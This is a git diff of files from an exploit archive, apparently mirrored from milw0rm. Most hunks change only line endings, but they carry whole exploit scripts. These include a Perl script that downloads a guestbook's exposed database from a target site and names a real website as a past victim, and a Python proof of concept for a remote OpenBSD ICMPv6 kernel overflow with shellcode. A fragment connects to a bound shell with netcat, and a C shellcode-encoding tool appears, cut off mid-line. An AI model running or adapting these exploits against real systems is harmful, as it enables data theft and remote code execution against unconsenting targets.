$useragent->get($target,":content_file" => "c:/db.mdb"); -if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();} -else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} - -# milw0rm.com [2009-04-09] +#!/usr/bin/perl +# By AlpHaNiX [NullArea.Net] +# alpha[at]hacker.bz +# Made in Tunisia +########### +# script : Exjune Guestbook v2 +# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp +########### +# Vulnerable : +# database path : /admin/exdb.mdb +########## +# Real Life Example : +# +# +# OOO OOO OO OO OO +# OO O O O O +# O O O OO OO O O O O OO OOO OOOO OOOOO +# O O O O O O O OOO OO OOOOOO O +# O OO O O O O O O O O OOOOOO +# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO +# +# +#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit +#[-] Found & Exploited By AlpHaNiX +# +# +#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// .... +#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb +########## +# Greetz for Zigma/Djek/unary/r1z + + +use lwp::UserAgent; + +system('cls'); +system('title Exjune Guestbook v2 Remote Database Disclosure Exploit'); +system('color 2'); +if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();} +if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } +print "\n\n\n\n OOO OOO OO OO OO\n" ; +print " OO O O O O\n" ; +print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ; +print " O O O O O O O OOO OO OOOOOO O\n" ; +print " O OO O O O O O O O O OOOOOO\n" ; +print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ; +print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n"; +print "[-] Found & Exploited By AlpHaNiX \n\n\n"; +print "[!] Exploiting $site ....\n"; +my $site = $ARGV[0] ; +my $target = $site."/admin/exdb.mdb" ; +my $useragent = LWP::UserAgent->new(); +my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); +if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();} +else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} + +# milw0rm.com [2009-04-09] diff --git a/platforms/bsd/remote/3491.py b/platforms/bsd/remote/3491.py index c58d88371..bd6276c43 100755 --- a/platforms/bsd/remote/3491.py +++ b/platforms/bsd/remote/3491.py @@ -1,166 +1,166 @@ -# The PoC executes the shellcode (int 3) and returns. It overwrites the -# ext_free() function pointer on the mbuf and forces a m_freem() on the -# overflowed packet. -# -# The Impacket library is used to craft and send packets -# (http://oss.coresecurity.com/projects/impacket.html or download from -# Debian repositories) -# -# Currently, only systems supporting raw sockets and the PF_PACKET family -# can run the included proof-of-concept code. -# -# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct -# 30" -# -# To use the code to test a custom machine you will need to: 1) Adjust the -# MACADDRESS variable 2) Find the right trampoline value for your system -# and replace it in the code. To find a proper trampoline value use the -# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the -# ICMP checksum -# -# The exploit should stop on an int 3 and pressing "c" in ddb the kernel -# will continue normally. -# -# -# Description: -# OpenBSD ICMPv6 fragment remote execution PoC -# -# Author: -# Alfredo Ortega -# Mario Vilas -# -# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. -# All rights reserved - -from impacket import ImpactPacket -import struct -import socket -import time - -class BSD_ICMPv6_Remote_BO: - MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) - def Run(self): - self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) - self.s.bind(('eth0',0x86dd)) - sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address - destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level - firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) - validIcmp = self.buildValidICMPPacket(sourceIP,destIP) - - for i in range(100): # fill mbufs - self.sendpacket(firstFragment) - self.sendpacket(validIcmp) - time.sleep(0.01) - for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable - self.sendpacket(secondFragment) - time.sleep(0.1) - self.sendpacket(firstFragment) - self.sendpacket(validIcmp) - time.sleep(0.1) - - def sendpacket(self, data): - ipe = ImpactPacket.Ethernet() - ipe.set_ether_dhost(self.MACADDRESS) - ipd = ImpactPacket.Data(data) - ipd.ethertype = 0x86dd # Ethertype for IPv6 - ipe.contains(ipd) - p = ipe.get_packet() - self.s.send(p) - - def buildOpenBSDPackets(self,sourceIP,destIP): - HopByHopLenght= 1 - - IPv6FragmentationHeader = '' - IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) - IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd - IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset - IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes - IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id - - IPv6HopByHopHeader = '' - IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) - IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) - IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options - - longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) - print longitud - IPv6Packet = '' - IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label - IPv6Packet += struct.pack( '>H', longitud ) # payload length - IPv6Packet += '\x00' # next header (2c: Fragmentation) - IPv6Packet += '\x40' # hop limit - - IPv6Packet += sourceIP - IPv6Packet += destIP - - firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) - - self.ShellCode = '' - self.ShellCode += '\xcc' # int 3 - self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret - - ICMPv6Packet = '' - ICMPv6Packet += '\x80' # type (128 == Icmp echo request) - ICMPv6Packet += '\x00' # code - ICMPv6Packet += '\xfb\x4e' # checksum - ICMPv6Packet += '\x33\xf6' # ID - ICMPv6Packet += '\x00\x00' # sequence - ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode - # Start of the next mfub (we land here): - ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards - ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' - # mbuf+0x20: - trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") - ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' - longitud = len(ICMPv6Packet) - - - IPv6Packet = '' - IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label - IPv6Packet += struct.pack( '>H', longitud ) # payload length - IPv6Packet += '\x2c' # next header (2c: Fragmentation) - IPv6Packet += '\x40' # hop limit - IPv6Packet += sourceIP - IPv6Packet += destIP - - IPv6FragmentationHeader = '' - IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) - IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd - IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset - IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no - IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id - - secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet - - return firstFragment, secondFragment - - - - def buildValidICMPPacket(self,sourceIP,destIP): - - ICMPv6Packet = '' - ICMPv6Packet += '\x80' # type (128 == Icmp echo request) - ICMPv6Packet += '\x00' # code - ICMPv6Packet += '\xcb\xc4' # checksum - ICMPv6Packet += '\x33\xf6' # ID - ICMPv6Packet += '\x00\x00' # sequence - ICMPv6Packet += 'T'*1232 - - longitud = len(ICMPv6Packet) - - IPv6Packet = '' - IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label - IPv6Packet += struct.pack( '>H', longitud ) # payload length - IPv6Packet += '\x3A' # next header (2c: Fragmentation) - IPv6Packet += '\x40' # hop limit - IPv6Packet += sourceIP - IPv6Packet += destIP - - icmpPacket = IPv6Packet+ICMPv6Packet - - return icmpPacket - -attack = BSD_ICMPv6_Remote_BO() -attack.Run() - -# milw0rm.com [2007-03-15] +# The PoC executes the shellcode (int 3) and returns. It overwrites the +# ext_free() function pointer on the mbuf and forces a m_freem() on the +# overflowed packet. +# +# The Impacket library is used to craft and send packets +# (http://oss.coresecurity.com/projects/impacket.html or download from +# Debian repositories) +# +# Currently, only systems supporting raw sockets and the PF_PACKET family +# can run the included proof-of-concept code. +# +# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct +# 30" +# +# To use the code to test a custom machine you will need to: 1) Adjust the +# MACADDRESS variable 2) Find the right trampoline value for your system +# and replace it in the code. To find a proper trampoline value use the +# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the +# ICMP checksum +# +# The exploit should stop on an int 3 and pressing "c" in ddb the kernel +# will continue normally. +# +# +# Description: +# OpenBSD ICMPv6 fragment remote execution PoC +# +# Author: +# Alfredo Ortega +# Mario Vilas +# +# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. +# All rights reserved + +from impacket import ImpactPacket +import struct +import socket +import time + +class BSD_ICMPv6_Remote_BO: + MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) + def Run(self): + self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) + self.s.bind(('eth0',0x86dd)) + sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address + destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level + firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) + validIcmp = self.buildValidICMPPacket(sourceIP,destIP) + + for i in range(100): # fill mbufs + self.sendpacket(firstFragment) + self.sendpacket(validIcmp) + time.sleep(0.01) + for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable + self.sendpacket(secondFragment) + time.sleep(0.1) + self.sendpacket(firstFragment) + self.sendpacket(validIcmp) + time.sleep(0.1) + + def sendpacket(self, data): + ipe = ImpactPacket.Ethernet() + ipe.set_ether_dhost(self.MACADDRESS) + ipd = ImpactPacket.Data(data) + ipd.ethertype = 0x86dd # Ethertype for IPv6 + ipe.contains(ipd) + p = ipe.get_packet() + self.s.send(p) + + def buildOpenBSDPackets(self,sourceIP,destIP): + HopByHopLenght= 1 + + IPv6FragmentationHeader = '' + IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) + IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd + IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes + IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id + + IPv6HopByHopHeader = '' + IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) + IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) + IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options + + longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) + print longitud + IPv6Packet = '' + IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label + IPv6Packet += struct.pack( '>H', longitud ) # payload length + IPv6Packet += '\x00' # next header (2c: Fragmentation) + IPv6Packet += '\x40' # hop limit + + IPv6Packet += sourceIP + IPv6Packet += destIP + + firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) + + self.ShellCode = '' + self.ShellCode += '\xcc' # int 3 + self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret + + ICMPv6Packet = '' + ICMPv6Packet += '\x80' # type (128 == Icmp echo request) + ICMPv6Packet += '\x00' # code + ICMPv6Packet += '\xfb\x4e' # checksum + ICMPv6Packet += '\x33\xf6' # ID + ICMPv6Packet += '\x00\x00' # sequence + ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode + # Start of the next mfub (we land here): + ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards + ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' + # mbuf+0x20: + trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") + ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' + longitud = len(ICMPv6Packet) + + + IPv6Packet = '' + IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label + IPv6Packet += struct.pack( '>H', longitud ) # payload length + IPv6Packet += '\x2c' # next header (2c: Fragmentation) + IPv6Packet += '\x40' # hop limit + IPv6Packet += sourceIP + IPv6Packet += destIP + + IPv6FragmentationHeader = '' + IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) + IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd + IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no + IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id + + secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet + + return firstFragment, secondFragment + + + + def buildValidICMPPacket(self,sourceIP,destIP): + + ICMPv6Packet = '' + ICMPv6Packet += '\x80' # type (128 == Icmp echo request) + ICMPv6Packet += '\x00' # code + ICMPv6Packet += '\xcb\xc4' # checksum + ICMPv6Packet += '\x33\xf6' # ID + ICMPv6Packet += '\x00\x00' # sequence + ICMPv6Packet += 'T'*1232 + + longitud = len(ICMPv6Packet) + + IPv6Packet = '' + IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label + IPv6Packet += struct.pack( '>H', longitud ) # payload length + IPv6Packet += '\x3A' # next header (2c: Fragmentation) + IPv6Packet += '\x40' # hop limit + IPv6Packet += sourceIP + IPv6Packet += destIP + + icmpPacket = IPv6Packet+ICMPv6Packet + + return icmpPacket + +attack = BSD_ICMPv6_Remote_BO() +attack.Run() + +# milw0rm.com [2007-03-15] diff --git a/platforms/cgi/webapps/177.pl b/platforms/cgi/webapps/177.pl index 24ae726f6..f0959e278 100755 --- a/platforms/cgi/webapps/177.pl +++ b/platforms/cgi/webapps/177.pl @@ -187,6 +187,6 @@ sub sendraw { } else { die("can\'t connect... aborting.\n"); } -} - -# milw0rm.com [2000-11-15] +} + +# milw0rm.com [2000-11-15] diff --git a/platforms/cgi/webapps/187.pl b/platforms/cgi/webapps/187.pl index 193200063..1e2fec053 100755 --- a/platforms/cgi/webapps/187.pl +++ b/platforms/cgi/webapps/187.pl @@ -66,6 +66,6 @@ close(SOCKET); print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); sleep(5); system("nc -w 10 $target 60179"); exit(0); - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/cgi/webapps/922.pl b/platforms/cgi/webapps/922.pl index cbaaee348..a42e88b16 100755 --- a/platforms/cgi/webapps/922.pl +++ b/platforms/cgi/webapps/922.pl @@ -62,6 +62,6 @@ while ($ans = <$s>) if ($flag == 1) { print " $ans"; } if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 } - } - -# milw0rm.com [2005-04-08] + } + +# milw0rm.com [2005-04-08] diff --git a/platforms/cgi/webapps/923.pl b/platforms/cgi/webapps/923.pl index 1f98bf848..02411018d 100755 --- a/platforms/cgi/webapps/923.pl +++ b/platforms/cgi/webapps/923.pl @@ -82,6 +82,6 @@ while (<$socket>) print $_; exit; } -} - -# milw0rm.com [2005-04-08] +} + +# milw0rm.com [2005-04-08] diff --git a/platforms/generator/shellcode/13289.c b/platforms/generator/shellcode/13289.c index c443c4180..00e03ca7a 100755 --- a/platforms/generator/shellcode/13289.c +++ b/platforms/generator/shellcode/13289.c @@ -1,501 +1,501 @@ -/* -______________________________________________________________________________ - - ,sSSSis ,sSSSs, Beta v2.0 (w32). - iS" dP dY" ,SP Encodes binary data to/from a variety of formats. - .SP dSS" ,sS" Copyright (C) 2003-2005 by Berend-Jan Wever - dS' Sb ,sY" - .SP dSSP' sSSSSSSP http://spaces.msn.com/members/berendjanwever -_ iS:_________________________________________________________________________ - - This program is free software; you can redistribute it and/or modify it under - the terms of the GNU General Public License version 2, 1991 as published by - the Free Software Foundation. - - This program is distributed in the hope that it will be useful, but WITHOUT - ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - details. - - A copy of the GNU General Public License can be found at: - http://www.gnu.org/licenses/gpl.html - or you can write to: - Free Software Foundation, Inc. - 59 Temple Place - Suite 330 - Boston, MA 02111-1307 - USA. -*/ - -#include -#include -#include -#include -#include -#include - -#define MAX_BUFFER_SIZE 0x1000 -#define DEFAULT_PAD_BYTE 0x90 -#define MAX_MARKER_SIZE 0x10 -#define bool char -#define true 1 -#define false 0 - -char* hex = "0123456789abcdef"; - -void version(void) { - printf( - "______________________________________________________________________________\n" - "\n" - " ,sSSSis ,sSSSs, Beta v2.0.\n" - " iS\" dP dY\" ,SP Encodes binary data to/from a variety of formats.\n" - " .SP dSS\" ,sS\" Copyright (C) 2003-2005 by Berend-Jan Wever\n" - " dS' Sb ,sY\" \n" - " .SP dSSP' sSSSSSSP http://spaces.msn.com/members/berendjanwever\n" - "_ iS:_________________________________________________________________________\n" - "\n" - ); - return; -} -void help(void) { - printf( - "Beta was developed to convert raw binary shellcode into text that can be\n" - "used in exploit source-code. It can convert raw binary data to a large\n" - "number of encodings.\n" - "\n" - " Usage: BETA [options] [input file name]\n" - "\n" - " input file name Read input from the given file. By default BETA\n" - " reads input from stdin.\n" - "\n" - "General options:\n" - " --help Display this help and exit\n" - " --version Output version information and exit\n" - " --verbose Displays additional information.\n" - " --pause Wait for keypress before exiting.\n" - "\n" - "Encoding options: (default = AA BB CC ...)\n" - " \\x \\xAA\\xBB\\xCC ...\n" - " 0x 0xAA 0xBB 0xCC ...\n" - " %% %%AA%%BB%%CC...\n" - " # oÞ!...\n" - " %%u %%uBBAA%%uDDCC...\n" - " --noencode Don't encode (only do checks).\n" - "\n" - "Layout options: (default = none)\n" - " --chars/line=X Output a new line after every X encoded bytes.\n" - " --quotes Wrap output in quotes. Only usefull in combination\n" - " with chars/line argument.\n" - " --quotesplus Wrap output in quotes and add a '+' at the end\n" - " of each line. Only usefull in combination with\n" - " chars/line argument.\n" - " --spaces Seperate encoding entities by spaces.\n" - " --commas Seperate encoding entities by commas and spaces.\n" - "\n" - "Additional options:\n" - " --padbyte=AA When using a multibyte encoding (e.g. %%uXXXX)\n" - " the data might need some padding. The given byte\n" - " will be used, the default value is %02x.\n" - " --badbytes[=AA[,BB[...]]] Check the input for presence of the given char-\n" - " acters and report where they are found. You can\n" - " supply a comma seperated list of hexadecimal\n" - " character codes and the keywords \"alpha\" and\n" - " \"print\" (to check for the presence of nonalpha-\n" - " numeric or non-printable characters). If no char-\n" - " acters are supplied, the input will be checked for\n" - " the presence of 00, 0A and 0D. \n" - " --marker[=AA[,BB[...]]] The input contains both garbage and data. The data\n" - " is wrapped by the marker bytes, everything before\n" - " the first set and after the last set of marker\n" - " bytes will be ignored. If no marker bytes are\n" - " supplied, \"CC CC CC\" (3xInt3) will be used.\n" - " You can supply up to %d bytes as marker.\n", - DEFAULT_PAD_BYTE, MAX_MARKER_SIZE - ); - return; -} - -// Find a set of bytes in another set of bytes -char* find_bytes(char* haystack, int haystack_length, char* needle, int needle_length) { - int needle_start = -1, needle_checked = 1; - do { - if (haystack[needle_start+needle_checked] == needle[needle_checked]) - // Yes, bytes match, check next byte of needle - needle_checked++; - else { - // No, no match, check next byte of haystack - needle_start++; - needle_checked = 0; - } - if (needle_start + needle_length > haystack_length) - // Not found. - return 0; - } while (needle_checked != needle_length); - // Found! - return haystack + needle_start; -} - -int main(int argc, char** argv, char** envp) { - - // This will contain the input data - char* buffer; - int buffer_length = 0; - - // This will contain the marker - char marker[MAX_MARKER_SIZE]; - int marker_length = 0; - - // This will keep track of all "bad" bytes - char char_is_bad[0x100]; - for (int i = 0; i < sizeof(char_is_bad)/sizeof(*char_is_bad); i++) - char_is_bad[i] = false; - - // These will store some values supplied by command line arguments - bool switch_verbose = false, switch_encode = true, switch_pause = false; - char pad_byte = DEFAULT_PAD_BYTE; - int chars_per_line = -1; - char *input_filename = 0; - char *line_header = "", *line_footer = "\n", *footer = "\n"; - char *bytes_format = "%02X", *byte_seperator = ""; - int bytes = 1; - - //-------------------------------------------------------------------------- - // Read and handle arguments - for (int argn = 1; argn < argc; argn++) { - //--help --------------------------------------------------------------- - if (stricmp(argv[argn], "--help") == 0) { - version(); - help(); - if (switch_pause) getchar(); - exit(EXIT_SUCCESS); - //--version ------------------------------------------------------------ - } else if (stricmp(argv[argn], "--version") == 0) { - version(); - if (switch_pause) getchar(); - exit(EXIT_SUCCESS); - //--verbose ------------------------------------------------------------ - } else if (stricmp(argv[argn], "--verbose") == 0) { - switch_verbose = true; - //--noencode ----------------------------------------------------------- - } else if (stricmp(argv[argn], "--noencode") == 0) { - switch_encode = false; - //--noencode ----------------------------------------------------------- - } else if (stricmp(argv[argn], "--pause") == 0) { - switch_pause = true; - //--chars/line= -------------------------------------------------------- - } else if (strnicmp(argv[argn], "--chars/line=", 13)==0) { - if ((chars_per_line = strtol(&(argv[argn][13]), NULL, 10)) < 1) { - printf("Illegal number of characters per line: \"%s\".\n", &(argv[argn][13])); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - //--layout options ----------------------------------------------------- - } else if (strcmp(argv[argn], "--quote") == 0 || strcmp(argv[argn], "--quotes") == 0) { - line_header = "\""; - line_footer = "\"\n"; - footer = "\"\n"; - } else if (strcmp(argv[argn], "--quoteplus") == 0 || strcmp(argv[argn], "--quotesplus") == 0) { - line_header = "\""; - line_footer = "\" +\n"; - footer = "\"\n"; - } else if (strcmp(argv[argn], "--comma") == 0 || strcmp(argv[argn], "--commas") == 0) { - byte_seperator = ", "; - } else if (strcmp(argv[argn], "--space") == 0 || strcmp(argv[argn], "--spaces") == 0) { - byte_seperator = " "; - //--encoding options --------------------------------------------------- - } else if (stricmp(argv[argn], "\\x")==0) { - bytes_format = "\\x%02X"; - } else if (stricmp(argv[argn], "0x")==0) { - bytes_format = "0x%02X"; - } else if (stricmp(argv[argn], "#")==0) { - bytes_format = "&#%d;"; - } else if (stricmp(argv[argn], "%")==0) { - bytes_format = "%%%02X"; - } else if (stricmp(argv[argn], "%u")==0) { - bytes_format = "%%u%04X"; - bytes = 2; - //--padbyte ------------------------------------------------------------ - } else if (strnicmp(argv[argn], "--padbyte=", 10) == 0) { - char* next_xarg; - pad_byte = strtol(&(argv[argn][10]), &next_xarg, 0x10); - if ((pad_byte & 0xFF) != pad_byte) { - printf("Incorrect value in padbyte argument: \"%s\".\n", &(argv[argn][11])); - printf(" Value cannot be converted to a byte "); - for (int i = 0; i < strlen(&(argv[argn][10])); i++) - printf("^"); - printf("\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (next_xarg == &(argv[argn][10])) { - printf("Incorrect byte encoding in padbyte argument: \"%s\".\n", &(argv[argn][10])); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - //--badbytes ----------------------------------------------------------- - } else if (stricmp(argv[argn], "--badbytes") == 0) { - char_is_bad[0x0] = true; - char_is_bad[0xA] = true; - char_is_bad[0xD] = true; - //--badbytes=XX,XX,... ------------------------------------------------- - } else if (strnicmp(argv[argn], "--badbytes=", 11) == 0) { - char* xarg = &(argv[argn][11]); - while (strlen(xarg) > 0) { - if (strnicmp(xarg, "alpha", 5) == 0) { - for (int i = 0; i < 0x100; i++) { - if (!isalnum(i)) char_is_bad[i] = true; - } - xarg += 5; - } else if (strnicmp(xarg, "print", 5) == 0) { - for (int i = 0; i < 0x100; i++) { - if (!isprint(i)) char_is_bad[i] = true; - } - xarg += 5; - } else { - char* next_xarg; - int decoded = strtol(xarg, &next_xarg, 0x10); - if ((decoded & 0xFF) != decoded) { - printf("Incorrect value in badbytes argument: \"%s\".\n", &(argv[argn][11])); - for (char* i = &(argv[argn][9]); i < xarg; i++) - printf(" "); - printf(" Value cannot be converted to a byte "); - for (char* i = xarg; i < next_xarg; i++) - printf("^"); - printf("\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (next_xarg == xarg) { - printf("Incorrect byte encoding in badbytes argument: \"%s\".\n", &(argv[argn][11])); - for (char* i = &(argv[argn][11]); i < xarg; i++) - printf(" "); - printf(" Character '%c' not expected ^\n", *xarg); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - - char_is_bad[decoded] = true; - xarg = next_xarg; - } - if (*xarg == ',') xarg++; - } - //--marker ------------------------------------------------------------- - } else if (stricmp(argv[argn], "--marker")==0) { - marker_length = 3; - for (int i = 0; i < marker_length; i++) marker[i] = 0xCC; - //--marker= ------------------------------------------------------------ - } else if (strnicmp(argv[argn], "--marker=", 9)==0) { - char* xarg = &(argv[argn][9]); - while (strlen(xarg) > 0) { - if (marker_length == MAX_MARKER_SIZE) { - printf("Given marker is too large, the maximum size is %d characters.\n", MAX_MARKER_SIZE); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - char* next_xarg; - int decoded = strtol(xarg, &next_xarg, 0x10); - if ((decoded & 0xFF) != decoded) { - printf("Incorrect value in marker argument: \"%s\".\n", &(argv[argn][9])); - for (char* i = &(argv[argn][9]); i < xarg; i++) - printf(" "); - printf(" Value cannot be converted to a byte "); - for (char* i = xarg; i < next_xarg; i++) - printf("^"); - printf("\n"); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - marker[marker_length] = decoded; - marker_length++; - if (next_xarg == xarg) { - printf("Incorrect byte encoding in marker argument: \"%s\".\n", &(argv[argn][9])); - for (char* i = &(argv[argn][9]); i < xarg; i++) - printf(" "); - printf(" Character '%c' not expected ^\n", *xarg); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - xarg = next_xarg; - if (*xarg == ',') xarg ++; - } - } else { - //--input filename ----------------------------------------------------- - if (input_filename != 0) { - printf( - "Two arguments are assumed to be file names, only one was expected:\n" - "\"%s\" and \"%s\"\n", - input_filename, argv[argn] - ); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - input_filename = argv[argn]; - } - } - - if (switch_verbose) version(); - - if (input_filename == 0) { - // Read from STDIN ----------------------------------------------------- - buffer = malloc(MAX_BUFFER_SIZE); - if (buffer == 0) { - printf("- Cannot allocate %d bytes of memory for input buffer.\n", MAX_BUFFER_SIZE); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (switch_verbose) printf(" Input _______________: STDIN, reading..."); - while (buffer_length < MAX_BUFFER_SIZE && (buffer[buffer_length] = getchar()) != EOF) buffer_length++; - if (switch_verbose) { - if (buffer_length == MAX_BUFFER_SIZE) - printf("\r Input _______________: STDIN, %d bytes (maximum size for input data).\n", buffer_length); - else - printf("\r Input _______________: STDIN, %d bytes.\n", buffer_length); - } - } else { - // Read from file ------------------------------------------------------ - int input_filedescriptor = 0; - if ((input_filedescriptor = open(input_filename, O_RDONLY | O_BINARY, 0)) == 0) { - printf("- Cannot open file \"%s\".\n", input_filename); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if ((buffer_length = lseek(input_filedescriptor, 0, SEEK_END)) == -1) { - printf("- Cannot find end of file \"%s\".\n", input_filename); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (buffer_length == 0) { - printf("- File \"%s\" is empty.\n", input_filename); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (lseek(input_filedescriptor, 0, SEEK_SET) == -1) { - printf("- Cannot find start of file \"%s\".\n", input_filename); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (switch_verbose) printf(" Input file __________: \"%s\", %d bytes.\n", input_filename, buffer_length); - if ((buffer = malloc(buffer_length)) == 0) { - printf("- Cannot allocate %d bytes of memory for input buffer.\n", buffer_length); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - int bytes_read_total = 0; - while (bytes_read_total < buffer_length) { - int bytes_read = read(input_filedescriptor, buffer+bytes_read_total, buffer_length-bytes_read_total); - if (bytes_read == -1) { - printf("- Cannot read from file \"%s\".\n", input_filename); - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - if (bytes_read == 0) { - printf("- Cannot read more then %d bytes of file \"%s\".\n", bytes_read_total, input_filename); - buffer_length = bytes_read_total; - if (switch_pause) getchar(); - exit(EXIT_FAILURE); - } - bytes_read_total += bytes_read; - } - close(input_filedescriptor); - } - - // Cut out the part surrounded by the markers ------------------------------ - if (marker_length > 0) { - if (switch_verbose) { - printf (" Marker bytes ________:"); - for (int i = 0; i < marker_length; i++) - printf(" %02X", marker[i] & 0xFF); - printf (".\n"); - } - char *marker_start, *marker_end; - // find the first marker - marker_start = find_bytes(buffer, buffer_length, marker, 